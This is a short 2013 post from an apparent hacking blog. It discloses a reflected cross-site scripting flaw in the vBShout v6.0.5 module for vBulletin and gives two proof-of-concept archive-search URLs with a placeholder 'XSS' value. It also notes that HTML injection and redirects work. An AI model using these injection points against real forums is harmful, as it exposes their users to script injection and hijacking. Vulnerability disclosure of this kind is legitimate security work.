The Hacking Univesre: vBulletin vBShout Module v6.0.5 - Reflected Cross-Site Scripting ( XSS )

Sunday, April 28, 2013

vBulletin vBShout Module v6.0.5 - Reflected Cross-Site Scripting ( XSS )

vBulletin vBShout Module v6.0.5 - Reflected Cross-Site Scripting ( XSS )

The last version of vBShout (6.0.5) suffers from Reflected Cross-Site Scripting , located in Search Archive

Update: Released version 6.0.6,but still vulnerable.

Poc: ( required to be logged )

http://www.site.com/vbshout.php?message=XSS&username=&hours=&from[month]=0&from[day]=&from[year] =0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1

http://www.site.com/vbshout.php?message=XSS&s=&do=archive&instanceid=1

Note: HTML Injection and Redirect works too!

The Hacking Univesre

Pages

Sunday, April 28, 2013

vBulletin vBShout Module v6.0.5 - Reflected Cross-Site Scripting ( XSS )

No comments:

Post a Comment